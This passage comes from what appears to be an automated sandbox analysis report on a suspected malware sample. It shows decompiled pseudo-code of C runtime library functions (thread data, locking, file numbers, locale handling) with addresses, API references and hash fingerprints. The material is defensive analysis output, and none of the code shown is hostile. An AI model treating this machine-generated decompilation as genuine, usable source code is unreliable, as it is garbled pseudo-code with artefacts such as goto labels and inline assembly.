                                                                      						}
                                                                      						goto L9;
                                                                      					}
                                                                      					L3:
                                                                      					_t92 = E0040BFC1(_t138);
                                                                      					_push(_t131);
                                                                      					_push(_t131);
                                                                      					_push(_t131);
                                                                      					_push(_t131);
                                                                      					 *_t92 = 0x16;
                                                                      					_push(_t131);
                                                                      					goto L4;
                                                                      				}
                                                                      			}





























                                                                      0x0040bcc2
                                                                      0x0040bcca
                                                                      0x0040bcce
                                                                      0x0040bcd3
                                                                      0x0040bcd5
                                                                      0x0040bcd8
                                                                      0x0040bcde
                                                                      0x0040bd01
                                                                      0x00000000
                                                                      0x0040bce5
                                                                      0x0040bce5
                                                                      0x0040bce7
                                                                      0x0040bd08
                                                                      0x0040bd0b
                                                                      0x0040bd0d
                                                                      0x0040bd1c
                                                                      0x0040bd1c
                                                                      0x0040bd1f
                                                                      0x0040bd24
                                                                      0x0040bd29
                                                                      0x0040bd29
                                                                      0x0040bd2c
                                                                      0x0040bd2e
                                                                      0x00000000
                                                                      0x0040bd30
                                                                      0x0040bd30
                                                                      0x0040bd35
                                                                      0x0040bd38
                                                                      0x0040bd3b
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x0040bd3d
                                                                      0x0040bd40
                                                                      0x0040bd44
                                                                      0x0040bd4b
                                                                      0x0040bd4e
                                                                      0x0040bd50
                                                                      0x0040bd5a
                                                                      0x0040bd52
                                                                      0x0040bd55
                                                                      0x0040bd55
                                                                      0x0040bd61
                                                                      0x0040bd63
                                                                      0x0040be53
                                                                      0x00000000
                                                                      0x0040bd69
                                                                      0x0040bd69
                                                                      0x0040bd69
                                                                      0x0040bd70
                                                                      0x0040bdb6
                                                                      0x0040bdb6
                                                                      0x0040bdb9
                                                                      0x0040be24
                                                                      0x0040be2a
                                                                      0x0040be2d
                                                                      0x0040beb8
                                                                      0x00000000
                                                                      0x0040bebe
                                                                      0x0040be33
                                                                      0x0040be37
                                                                      0x0040be87
                                                                      0x0040be87
                                                                      0x0040be8b
                                                                      0x0040be95
                                                                      0x0040be9a
                                                                      0x0040be9a
                                                                      0x0040bea2
                                                                      0x0040beaa
                                                                      0x0040beab
                                                                      0x0040beac
                                                                      0x0040bead
                                                                      0x0040beae
                                                                      0x0040bcf9
                                                                      0x0040bcf9
                                                                      0x00000000
                                                                      0x0040bcfe
                                                                      0x0040be39
                                                                      0x0040be3c
                                                                      0x0040be3f
                                                                      0x0040be44
                                                                      0x0040be45
                                                                      0x0040be45
                                                                      0x0040be45
                                                                      0x0040be48
                                                                      0x00000000
                                                                      0x0040be48
                                                                      0x0040bdbb
                                                                      0x0040bdbf
                                                                      0x0040bde0
                                                                      0x0040bde5
                                                                      0x0040bde7
                                                                      0x0040bde9
                                                                      0x0040bde9
                                                                      0x0040bdc1
                                                                      0x0040bdc8
                                                                      0x0040bdca
                                                                      0x0040bdd7
                                                                      0x0040bdd7
                                                                      0x0040bdd7
                                                                      0x0040bdda
                                                                      0x0040bdcc
                                                                      0x0040bdce
                                                                      0x0040bdd1
                                                                      0x0040bdd1
                                                                      0x0040bddc
                                                                      0x0040bddc
                                                                      0x0040bdeb
                                                                      0x0040bdee
                                                                      0x00000000
                                                                      0x0040bdf4
                                                                      0x0040bdf4
                                                                      0x0040bdf5
                                                                      0x0040bdf9
                                                                      0x0040bdfe
                                                                      0x0040bdff
                                                                      0x0040be00
                                                                      0x0040be05
                                                                      0x0040be08
                                                                      0x0040be0a
                                                                      0x0040bec6
                                                                      0x00000000
                                                                      0x0040bec6
                                                                      0x0040be10
                                                                      0x0040be13
                                                                      0x0040beb4
                                                                      0x0040beb4
                                                                      0x0040beb4
                                                                      0x0040beb4
                                                                      0x00000000
                                                                      0x0040beb4
                                                                      0x0040be19
                                                                      0x0040be1c
                                                                      0x0040be1e
                                                                      0x00000000
                                                                      0x0040be1e
                                                                      0x0040bdee
                                                                      0x0040bd72
                                                                      0x0040bd75
                                                                      0x0040bd77
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x0040bd79
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x0040bd7f
                                                                      0x0040bd81
                                                                      0x0040bd83
                                                                      0x0040bd85
                                                                      0x0040bd85
                                                                      0x0040bd87
                                                                      0x0040bd8a
                                                                      0x0040be5b
                                                                      0x0040be5d
                                                                      0x0040be61
                                                                      0x0040be6a
                                                                      0x0040be6f
                                                                      0x0040be6f
                                                                      0x0040be72
                                                                      0x0040be77
                                                                      0x0040be78
                                                                      0x0040be79
                                                                      0x0040be7a
                                                                      0x0040be7b
                                                                      0x0040be81
                                                                      0x00000000
                                                                      0x0040bd90
                                                                      0x0040bd99
                                                                      0x0040bd9e
                                                                      0x0040bda1
                                                                      0x0040bda3
                                                                      0x0040bda6
                                                                      0x0040bda8
                                                                      0x0040bdab
                                                                      0x0040bdae
                                                                      0x0040bdae
                                                                      0x0040be4b
                                                                      0x0040be4b
                                                                      0x0040be4b
                                                                      0x00000000
                                                                      0x0040bd69
                                                                      0x0040bd63
                                                                      0x0040bd2e
                                                                      0x0040bd0f
                                                                      0x0040bd14
                                                                      0x0040bd14
                                                                      0x0040bd17
                                                                      0x0040bd1a
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x0040bd1a
                                                                      0x0040bce9
                                                                      0x0040bce9
                                                                      0x0040bcee
                                                                      0x0040bcef
                                                                      0x0040bcf0
                                                                      0x0040bcf1
                                                                      0x0040bcf2
                                                                      0x0040bcf8
                                                                      0x00000000
                                                                      0x0040bcf8

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.366895867.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000002.00000002.366895867.0000000000426000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.366895867.000000000042F000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_400000_amMl.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: _memset$__filbuf__fileno__getptd_noexit__read_memcpy_s
                                                                      • String ID:
                                                                      • API String ID: 3886058894-0
                                                                      • Opcode ID: c8cdba87b669e5a45588b0eb276f39e335abb1b1e80ab099951c299220f7b7ba
                                                                      • Instruction ID: 0234425abcb0213f77efd30778ac7634d7a408156a07f93f58cd91f86a00e979
                                                                      • Opcode Fuzzy Hash: c8cdba87b669e5a45588b0eb276f39e335abb1b1e80ab099951c299220f7b7ba
                                                                      • Instruction Fuzzy Hash: 1E519031A00605ABCB209F69C844A9FBB75EF41324F24863BF825B22D1D7799E51CBDD
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.366986826.00000000005B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 005B0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_5b0000_amMl.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: __fileno$__getptd_noexit__lock_file
                                                                      • String ID: 'B
                                                                      • API String ID: 3755561058-2787509829
                                                                      • Opcode ID: 2b0b2601706cdb465d4c9eff24f73974ea9fb0f2dbbf8fc2cbf9e4943b65d960
                                                                      • Instruction ID: 1087d250c6105b9df1235495b0dbeb6ea13c8801cb9ccdc8ec5811bba747c2e7
                                                                      • Opcode Fuzzy Hash: 2b0b2601706cdb465d4c9eff24f73974ea9fb0f2dbbf8fc2cbf9e4943b65d960
                                                                      • Instruction Fuzzy Hash: 0F01663310461956D2216B786C4B4FDBFA0BEC6B3033A8715F0709B1D2EB28FD429299
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • __getptd.LIBCMT ref: 005C49AB
                                                                        • Part of subcall function 005C099C: __getptd_noexit.LIBCMT ref: 005C099F
                                                                        • Part of subcall function 005C099C: __amsg_exit.LIBCMT ref: 005C09AC
                                                                      • __getptd.LIBCMT ref: 005C49C2
                                                                      • __amsg_exit.LIBCMT ref: 005C49D0
                                                                      • __lock.LIBCMT ref: 005C49E0
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.366986826.00000000005B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 005B0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_5b0000_amMl.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: __amsg_exit__getptd$__getptd_noexit__lock
                                                                      • String ID: @.B
                                                                      • API String ID: 3521780317-470711618
                                                                      • Opcode ID: f43c5434038c0e2b3130a40ea1e7b9b854db78837d0c16722a3a572f716d4dbb
                                                                      • Instruction ID: cbee799ba8ab69660176c9eed35308b3db0e4f18da0be88717c5aa29e8422c55
                                                                      • Opcode Fuzzy Hash: f43c5434038c0e2b3130a40ea1e7b9b854db78837d0c16722a3a572f716d4dbb
                                                                      • Instruction Fuzzy Hash: 33F09031A407219FDB20FBE4890BFEA7BA07F80760F55051EE444A72D2DB74A801DF95
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 90%
                                                                      			E00414738(void* __ebx, void* __edx, intOrPtr __edi, void* __esi, void* __eflags) {
                                                                      				signed int _t13;
                                                                      				intOrPtr _t28;
                                                                      				void* _t29;
                                                                      				void* _t30;
                                                                      
                                                                      				_t30 = __eflags;
                                                                      				_t26 = __edi;
                                                                      				_t25 = __edx;
                                                                      				_t22 = __ebx;
                                                                      				_push(0xc);
                                                                      				_push(0x4214d0);
                                                                      				E0040E1D8(__ebx, __edi, __esi);
                                                                      				_t28 = E00410735(__ebx, __edx, __edi, _t30);
                                                                      				_t13 =  *0x422e34; // 0xfffffffe
                                                                      				if(( *(_t28 + 0x70) & _t13) == 0) {
                                                                      					L6:
                                                                      					E0040D6E0(_t22, 0xc);
                                                                      					 *(_t29 - 4) =  *(_t29 - 4) & 0x00000000;
                                                                      					_t8 = _t28 + 0x6c; // 0x6c
                                                                      					_t26 =  *0x422f18; // 0x422e40
                                                                      					 *((intOrPtr*)(_t29 - 0x1c)) = E004146FA(_t8, _t26);
                                                                      					 *(_t29 - 4) = 0xfffffffe;
                                                                      					E004147A2();
                                                                      				} else {
                                                                      					_t32 =  *((intOrPtr*)(_t28 + 0x6c));
                                                                      					if( *((intOrPtr*)(_t28 + 0x6c)) == 0) {
                                                                      						goto L6;
                                                                      					} else {
                                                                      						_t28 =  *((intOrPtr*)(E00410735(_t22, __edx, _t26, _t32) + 0x6c));
                                                                      					}
                                                                      				}
                                                                      				if(_t28 == 0) {
                                                                      					E0040E79A(_t25, _t26, 0x20);
                                                                      				}
                                                                      				return E0040E21D(_t28);
                                                                      			}







                                                                      0x00414738
                                                                      0x00414738
                                                                      0x00414738
                                                                      0x00414738
                                                                      0x00414738
                                                                      0x0041473a
                                                                      0x0041473f
                                                                      0x00414749
                                                                      0x0041474b
                                                                      0x00414753
                                                                      0x00414777
                                                                      0x00414779
                                                                      0x0041477f
                                                                      0x00414783
                                                                      0x00414786
                                                                      0x00414791
                                                                      0x00414794
                                                                      0x0041479b
                                                                      0x00414755
                                                                      0x00414755
                                                                      0x00414759
                                                                      0x00000000
                                                                      0x0041475b
                                                                      0x00414760
                                                                      0x00414760
                                                                      0x00414759
                                                                      0x00414765
                                                                      0x00414769
                                                                      0x0041476e
                                                                      0x00414776

                                                                      APIs
                                                                      • __getptd.LIBCMT ref: 00414744
                                                                        • Part of subcall function 00410735: __getptd_noexit.LIBCMT ref: 00410738
                                                                        • Part of subcall function 00410735: __amsg_exit.LIBCMT ref: 00410745
                                                                      • __getptd.LIBCMT ref: 0041475B
                                                                      • __amsg_exit.LIBCMT ref: 00414769
                                                                      • __lock.LIBCMT ref: 00414779
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.366895867.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000002.00000002.366895867.0000000000426000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.366895867.000000000042F000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_400000_amMl.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: __amsg_exit__getptd$__getptd_noexit__lock
                                                                      • String ID: @.B
                                                                      • API String ID: 3521780317-470711618
                                                                      • Opcode ID: f43c5434038c0e2b3130a40ea1e7b9b854db78837d0c16722a3a572f716d4dbb
                                                                      • Instruction ID: 91aff3cf2d6bbea4e2ea5d49e8e08bf0f41c3eb50374f8394f27d7b6c467aa53
                                                                      • Opcode Fuzzy Hash: f43c5434038c0e2b3130a40ea1e7b9b854db78837d0c16722a3a572f716d4dbb
                                                                      • Instruction Fuzzy Hash: 60F09631A407009BE720BB66850678D73A06F81719F91456FE4646B2D1CB7C6981CA5D
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • ___addlocaleref.LIBCMT ref: 005C4973
                                                                      • ___removelocaleref.LIBCMT ref: 005C497E
                                                                      • ___freetlocinfo.LIBCMT ref: 005C4992
                                                                        • Part of subcall function 005C46F0: ___free_lconv_mon.LIBCMT ref: 005C4736
                                                                        • Part of subcall function 005C46F0: ___free_lconv_num.LIBCMT ref: 005C4757
                                                                        • Part of subcall function 005C46F0: ___free_lc_time.LIBCMT ref: 005C47DC
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.366986826.00000000005B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 005B0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_5b0000_amMl.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: ___addlocaleref___free_lc_time___free_lconv_mon___free_lconv_num___freetlocinfo___removelocaleref
                                                                      • String ID: @.B$@.B
                                                                      • API String ID: 4212647719-183327057
                                                                      • Opcode ID: 3857329619949c293296419ec2be8f51648e9d3bf58d3a63f1cc8ec60b1035b6
                                                                      • Instruction ID: ac3ef583a27a8e3f97789a358e2a519a1391b0cee9fff06e45c65e2ee4aecf55
                                                                      • Opcode Fuzzy Hash: 3857329619949c293296419ec2be8f51648e9d3bf58d3a63f1cc8ec60b1035b6
                                                                      • Instruction Fuzzy Hash: BFE0DF32511A320D8A312A9C6820F6F9E943FE2312B1B212EF84CE7045DB344C808CE4
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 77%
                                                                      			E0040C73D(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4) {
                                                                      				intOrPtr _v8;
                                                                      				void* _t16;
                                                                      				void* _t17;
                                                                      				intOrPtr _t19;
                                                                      				void* _t21;
                                                                      				signed int _t22;
                                                                      				intOrPtr* _t27;
                                                                      				intOrPtr _t39;
                                                                      				intOrPtr _t40;
                                                                      				intOrPtr _t50;
                                                                      
                                                                      				_t37 = __edx;
                                                                      				_push(8);
                                                                      				_push(0x421140);
                                                                      				E0040E1D8(__ebx, __edi, __esi);
                                                                      				_t39 = _a4;
                                                                      				_t50 = _t39;
                                                                      				_t51 = _t50 != 0;
                                                                      				if(_t50 != 0) {
                                                                      					E0040FB29(_t39);
                                                                      					_v8 = 0;
                                                                      					 *(_t39 + 0xc) =  *(_t39 + 0xc) & 0xffffffcf;
                                                                      					_t16 = E0040FA20(__edx, _t39, _t39);
                                                                      					__eflags = _t16 - 0xffffffff;
                                                                      					if(_t16 == 0xffffffff) {
                                                                      						L6:
                                                                      						_t17 = 0x4227e0;
                                                                      					} else {
                                                                      						_t21 = E0040FA20(__edx, _t39, _t39);
                                                                      						__eflags = _t21 - 0xfffffffe;
                                                                      						if(_t21 == 0xfffffffe) {
                                                                      							goto L6;
                                                                      						} else {
                                                                      							_t22 = E0040FA20(__edx, _t39, _t39);
                                                                      							_t17 = ((E0040FA20(_t37, _t39, _t39) & 0x0000001f) << 6) +  *((intOrPtr*)(0x423f60 + (_t22 >> 5) * 4));
                                                                      						}
                                                                      					}
                                                                      					_t9 = _t17 + 4; // 0xa80
                                                                      					 *(_t17 + 4) =  *_t9 & 0x000000fd;
                                                                      					_v8 = 0xfffffffe;
                                                                      					E0040C735(_t39);
                                                                      					_t19 = 0;
                                                                      					__eflags = 0;
                                                                      				} else {
                                                                      					_t27 = E0040BFC1(_t51);
                                                                      					_t40 = 0x16;
                                                                      					 *_t27 = _t40;
                                                                      					_push(0);
                                                                      					_push(0);
                                                                      					_push(0);
                                                                      					_push(0);
                                                                      					_push(0);
                                                                      					E0040E744(__edx, _t40, 0);
                                                                      					_t19 = _t40;
                                                                      				}
                                                                      				return E0040E21D(_t19);
                                                                      			}













                                                                      0x0040c73d
                                                                      0x0040c690
                                                                      0x0040c692
                                                                      0x0040c697
                                                                      0x0040c69e
                                                                      0x0040c6a3
                                                                      0x0040c6a8
                                                                      0x0040c6aa
                                                                      0x0040c6c8
                                                                      0x0040c6ce
                                                                      0x0040c6d1
                                                                      0x0040c6d6
                                                                      0x0040c6dc
                                                                      0x0040c6df
                                                                      0x0040c70f
                                                                      0x0040c70f
                                                                      0x0040c6e1
                                                                      0x0040c6e2
                                                                      0x0040c6e8
                                                                      0x0040c6eb
                                                                      0x00000000
                                                                      0x0040c6ed
                                                                      0x0040c6ee
                                                                      0x0040c70b
                                                                      0x0040c70b
                                                                      0x0040c6eb
                                                                      0x0040c714
                                                                      0x0040c71b
                                                                      0x0040c71e
                                                                      0x0040c725
                                                                      0x0040c72a
                                                                      0x0040c72a
                                                                      0x0040c6ac
                                                                      0x0040c6ac
                                                                      0x0040c6b3
                                                                      0x0040c6b4
                                                                      0x0040c6b6
                                                                      0x0040c6b7
                                                                      0x0040c6b8
                                                                      0x0040c6b9
                                                                      0x0040c6ba
                                                                      0x0040c6bb
                                                                      0x0040c6c3
                                                                      0x0040c6c3
                                                                      0x0040c731

                                                                      APIs
                                                                      • __lock_file.LIBCMT ref: 0040C6C8
                                                                      • __fileno.LIBCMT ref: 0040C6D6
                                                                      • __fileno.LIBCMT ref: 0040C6E2
                                                                      • __fileno.LIBCMT ref: 0040C6EE
                                                                      • __fileno.LIBCMT ref: 0040C6FE
                                                                        • Part of subcall function 0040BFC1: __getptd_noexit.LIBCMT ref: 0040BFC1
                                                                        • Part of subcall function 0040E744: __decode_pointer.LIBCMT ref: 0040E74F
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.366895867.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000002.00000002.366895867.0000000000426000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.366895867.000000000042F000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_400000_amMl.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: __fileno$__decode_pointer__getptd_noexit__lock_file
                                                                      • String ID:
                                                                      • API String ID: 2805327698-0
                                                                      • Opcode ID: 2b0b2601706cdb465d4c9eff24f73974ea9fb0f2dbbf8fc2cbf9e4943b65d960
                                                                      • Instruction ID: db056c5abb1484b678344f3d998e50672bc49cccd6cfe868de5707b4f3f6250f
                                                                      • Opcode Fuzzy Hash: 2b0b2601706cdb465d4c9eff24f73974ea9fb0f2dbbf8fc2cbf9e4943b65d960
                                                                      • Instruction Fuzzy Hash: 1A01253231451096C261ABBE5CC246E76A0DE81734726877FF024BB1D2DB3C99429E9D
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • __getptd.LIBCMT ref: 005C423F
                                                                        • Part of subcall function 005C099C: __getptd_noexit.LIBCMT ref: 005C099F
                                                                        • Part of subcall function 005C099C: __amsg_exit.LIBCMT ref: 005C09AC
                                                                      • __amsg_exit.LIBCMT ref: 005C425F
                                                                      • __lock.LIBCMT ref: 005C426F
                                                                      • InterlockedDecrement.KERNEL32(?), ref: 005C428C
                                                                      • InterlockedIncrement.KERNEL32(00422D38), ref: 005C42B7
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.366986826.00000000005B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 005B0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_5b0000_amMl.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock
                                                                      • String ID:
                                                                      • API String ID: 4271482742-0
                                                                      • Opcode ID: 75ed1ba79165a940210d4fbe753a496d3ed1b888d754918a7527295a16311c61
                                                                      • Instruction ID: 6878c2d7d5a13e19f8403f20707a828ce1c2a5ead18950f3b4b7e2ad2a06008b
                                                                      • Opcode Fuzzy Hash: 75ed1ba79165a940210d4fbe753a496d3ed1b888d754918a7527295a16311c61
                                                                      • Instruction Fuzzy Hash: 4F01C435A01622EFDB21ABA4980BFEEBF60BF84720F540019F814A7291C7746981DFD9
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 89%
                                                                      			E00413FCC(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                                                                      				signed int _t15;
                                                                      				LONG* _t21;
                                                                      				long _t23;
                                                                      				void* _t31;
                                                                      				LONG* _t33;
                                                                      				void* _t34;
                                                                      				void* _t35;
                                                                      
                                                                      				_t35 = __eflags;
                                                                      				_t29 = __edx;
                                                                      				_t25 = __ebx;
                                                                      				_push(0xc);
                                                                      				_push(0x421490);
                                                                      				E0040E1D8(__ebx, __edi, __esi);
                                                                      				_t31 = E00410735(__ebx, __edx, __edi, _t35);
                                                                      				_t15 =  *0x422e34; // 0xfffffffe
                                                                      				if(( *(_t31 + 0x70) & _t15) == 0 ||  *((intOrPtr*)(_t31 + 0x6c)) == 0) {
                                                                      					E0040D6E0(_t25, 0xd);
                                                                      					 *(_t34 - 4) =  *(_t34 - 4) & 0x00000000;
                                                                      					_t33 =  *(_t31 + 0x68);
                                                                      					 *(_t34 - 0x1c) = _t33;
                                                                      					__eflags = _t33 -  *0x422d38; // 0x2241638
                                                                      					if(__eflags != 0) {
                                                                      						__eflags = _t33;
                                                                      						if(_t33 != 0) {
                                                                      							_t23 = InterlockedDecrement(_t33);
                                                                      							__eflags = _t23;
                                                                      							if(_t23 == 0) {
                                                                      								__eflags = _t33 - 0x422910;
                                                                      								if(__eflags != 0) {
                                                                      									_push(_t33);
                                                                      									E0040B6B5(_t25, _t31, _t33, __eflags);
                                                                      								}
                                                                      							}
                                                                      						}
                                                                      						_t21 =  *0x422d38; // 0x2241638
                                                                      						 *(_t31 + 0x68) = _t21;
                                                                      						_t33 =  *0x422d38; // 0x2241638
                                                                      						 *(_t34 - 0x1c) = _t33;
                                                                      						InterlockedIncrement(_t33);
                                                                      					}
                                                                      					 *(_t34 - 4) = 0xfffffffe;
                                                                      					E00414067();
                                                                      				} else {
                                                                      					_t33 =  *(_t31 + 0x68);
                                                                      				}
                                                                      				if(_t33 == 0) {
                                                                      					E0040E79A(_t29, _t31, 0x20);
                                                                      				}
                                                                      				return E0040E21D(_t33);
                                                                      			}










                                                                      0x00413fcc
                                                                      0x00413fcc
                                                                      0x00413fcc
                                                                      0x00413fcc
                                                                      0x00413fce
                                                                      0x00413fd3
                                                                      0x00413fdd
                                                                      0x00413fdf
                                                                      0x00413fe7
                                                                      0x00414008
                                                                      0x0041400e
                                                                      0x00414012
                                                                      0x00414015
                                                                      0x00414018
                                                                      0x0041401e
                                                                      0x00414020
                                                                      0x00414022
                                                                      0x00414025
                                                                      0x0041402b
                                                                      0x0041402d
                                                                      0x0041402f
                                                                      0x00414035
                                                                      0x00414037
                                                                      0x00414038
                                                                      0x0041403d
                                                                      0x00414035
                                                                      0x0041402d
                                                                      0x0041403e
                                                                      0x00414043
                                                                      0x00414046
                                                                      0x0041404c
                                                                      0x00414050
                                                                      0x00414050
                                                                      0x00414056
                                                                      0x0041405d
                                                                      0x00413fef
                                                                      0x00413fef
                                                                      0x00413fef
                                                                      0x00413ff4
                                                                      0x00413ff8
                                                                      0x00413ffd
                                                                      0x00414005

                                                                      APIs
                                                                      • __getptd.LIBCMT ref: 00413FD8
                                                                        • Part of subcall function 00410735: __getptd_noexit.LIBCMT ref: 00410738
                                                                        • Part of subcall function 00410735: __amsg_exit.LIBCMT ref: 00410745
                                                                      • __amsg_exit.LIBCMT ref: 00413FF8
                                                                      • __lock.LIBCMT ref: 00414008
                                                                      • InterlockedDecrement.KERNEL32(?), ref: 00414025
                                                                      • InterlockedIncrement.KERNEL32(02241638), ref: 00414050
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.366895867.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000002.00000002.366895867.0000000000426000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.366895867.000000000042F000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_400000_amMl.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock
                                                                      • String ID:
                                                                      • API String ID: 4271482742-0
                                                                      • Opcode ID: 75ed1ba79165a940210d4fbe753a496d3ed1b888d754918a7527295a16311c61
                                                                      • Instruction ID: 77fb08d543caf33888dccec20a3998fa005b1348dfeb798e4aa279577202aa48
                                                                      • Opcode Fuzzy Hash: 75ed1ba79165a940210d4fbe753a496d3ed1b888d754918a7527295a16311c61
                                                                      • Instruction Fuzzy Hash: 9301A531A01621ABD724AF67990579E7B60AF48764F50442BE814B72D0C77C6DC2CBDD
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.366986826.00000000005B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 005B0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_5b0000_amMl.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: $2$l
                                                                      • API String ID: 0-3132104027
                                                                      • Opcode ID: 93ec677eb6f37e13f038257329e2d2bc6cd763e678568b4eabc98800338fe0cb
                                                                      • Instruction ID: 7716afe95ae3bcdc016b848fe434a22ff3bc75f0c09f063f0a0137157d8b71f4
                                                                      • Opcode Fuzzy Hash: 93ec677eb6f37e13f038257329e2d2bc6cd763e678568b4eabc98800338fe0cb
                                                                      • Instruction Fuzzy Hash: B241F338804A698EDF349AA5889CBF87FB1BB03355F1401CEC09966193C7794EC6CF48
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.366986826.00000000005B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 005B0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_5b0000_amMl.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: __calloc_crt
                                                                      • String ID: P$B$`$B
                                                                      • API String ID: 3494438863-235554963
                                                                      • Opcode ID: fdf4f6b62053dea64867d0c1085960dee66dbdb5e7cbac4bce55836661d1e8cf
                                                                      • Instruction ID: fcd3326c3878762db55c03a528e5a54cec4855616686b5ebc1193c33e3255c43
                                                                      • Opcode Fuzzy Hash: fdf4f6b62053dea64867d0c1085960dee66dbdb5e7cbac4bce55836661d1e8cf
                                                                      • Instruction Fuzzy Hash: 491106313086165FE7248F2CBC55BA52B91FBC5324BB4463AE611CB2A4E770EC824758
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 65%
                                                                      			E00413610() {
                                                                      				signed long long _v12;
                                                                      				signed int _v20;
                                                                      				signed long long _v28;
                                                                      				signed char _t8;
                                                                      
                                                                      				_t8 = GetModuleHandleA("KERNEL32");
                                                                      				if(_t8 == 0) {
                                                                      					L6:
                                                                      					_v20 =  *0x41fb50;
                                                                      					_v28 =  *0x41fb48;
                                                                      					asm("fsubr qword [ebp-0x18]");
                                                                      					_v12 = _v28 / _v20 * _v20;
                                                                      					asm("fld1");
                                                                      					asm("fcomp qword [ebp-0x8]");
                                                                      					asm("fnstsw ax");
                                                                      					if((_t8 & 0x00000005) != 0) {
                                                                      						return 0;
                                                                      					} else {
                                                                      						return 1;
                                                                      					}
                                                                      				} else {
                                                                      					__eax = GetProcAddress(__eax, "IsProcessorFeaturePresent");
                                                                      					if(__eax == 0) {
                                                                      						goto L6;
                                                                      					} else {
                                                                      						_push(0);
                                                                      						return __eax;
                                                                      					}
                                                                      				}
                                                                      			}







                                                                      0x00413615
                                                                      0x0041361d
                                                                      0x00413634
                                                                      0x004135e0
                                                                      0x004135e9
                                                                      0x004135f5
                                                                      0x004135f8
                                                                      0x004135fb
                                                                      0x004135fd
                                                                      0x00413600
                                                                      0x00413605
                                                                      0x0041360f
                                                                      0x00413607
                                                                      0x0041360b
                                                                      0x0041360b
                                                                      0x0041361f
                                                                      0x00413625
                                                                      0x0041362d
                                                                      0x00000000
                                                                      0x0041362f
                                                                      0x0041362f
                                                                      0x00413633
                                                                      0x00413633
                                                                      0x0041362d

                                                                      APIs
